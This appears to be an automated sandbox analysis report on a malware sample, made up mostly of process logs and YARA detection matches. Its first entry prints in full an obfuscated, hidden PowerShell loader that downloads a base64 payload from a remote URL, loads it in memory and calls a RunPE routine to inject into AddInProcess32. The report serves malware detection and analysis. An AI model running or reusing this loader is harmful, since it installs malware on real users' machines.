        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex( ('9'+'jDurl = v'+'e5ht'+'t'+'p'+'s://ia60'+'0100.us.a'+'rch'+'ive.o'+'rg/2'+'4/items/deta'+'h-'+'note-v/D'+'etah'+'NoteV.txt'+'ve5;'+'9jDbase64Co'+'nt'+'ent'+' = (N'+'ew-Obj'+'ec'+'t Sys'+'tem'+'.'+'Net.WebClient).Downl'+'oadS'+'tr'+'ing(9jDur'+'l'+');9jDb'+'ina'+'ry'+'C'+'ontent = '+'[Sys'+'tem.'+'Convert]::From'+'Ba'+'se64Str'+'i'+'ng('+'9'+'jDbase64Con'+'ten'+'t);9jDassembly = [R'+'eflect'+'ion.Assembl'+'y]::Load(9jD'+'bin'+'aryCon'+'ten'+'t);9jD'+'type = 9'+'jDassemb'+'ly.Get'+'Ty'+'pe(ve5RunPE.Homev'+'e5);9'+'jD'+'method = 9j'+'Dt'+'yp'+'e.GetMethod(ve5VAIve5);9jDmet'+'hod.'+'Inv'+'o'+'ke(9jDnull'+', [object'+'['+']]@(ve50/MN'+'Ta'+'A/d/ee.etsap//:spt'+'th'+'ve5 , ve5des'+'ativadove5 , ve5desati'+'vadove5 '+', '+'ve5desativ'+'adov'+'e5,ve'+'5AddIn'+'Pr'+'oce'+'ss32ve5,ve5ve5'+')'+')').RePlaCe('9jD',[strING][ChAR]36).RePlaCe('ve5',[strING][ChAR]39) )"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF887971AE9 push eax; iretd 2_2_00007FF887971B5D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF8879847AB push ecx; retf 4_2_00007FF8879847AC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF88798C757 push ebp; retf 4_2_00007FF88798C758
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF88798621D push E85B562Fh; ret 4_2_00007FF8879862F9

        Boot Survival

        barindex
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1760, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfb57c99b8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.powershell.exe.1dfb57c99b8.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1760, type: MEMORYSTR
        Source: powershell.exe, 00000004.00000002.1489737253.000001DFB57B3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2700013071.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
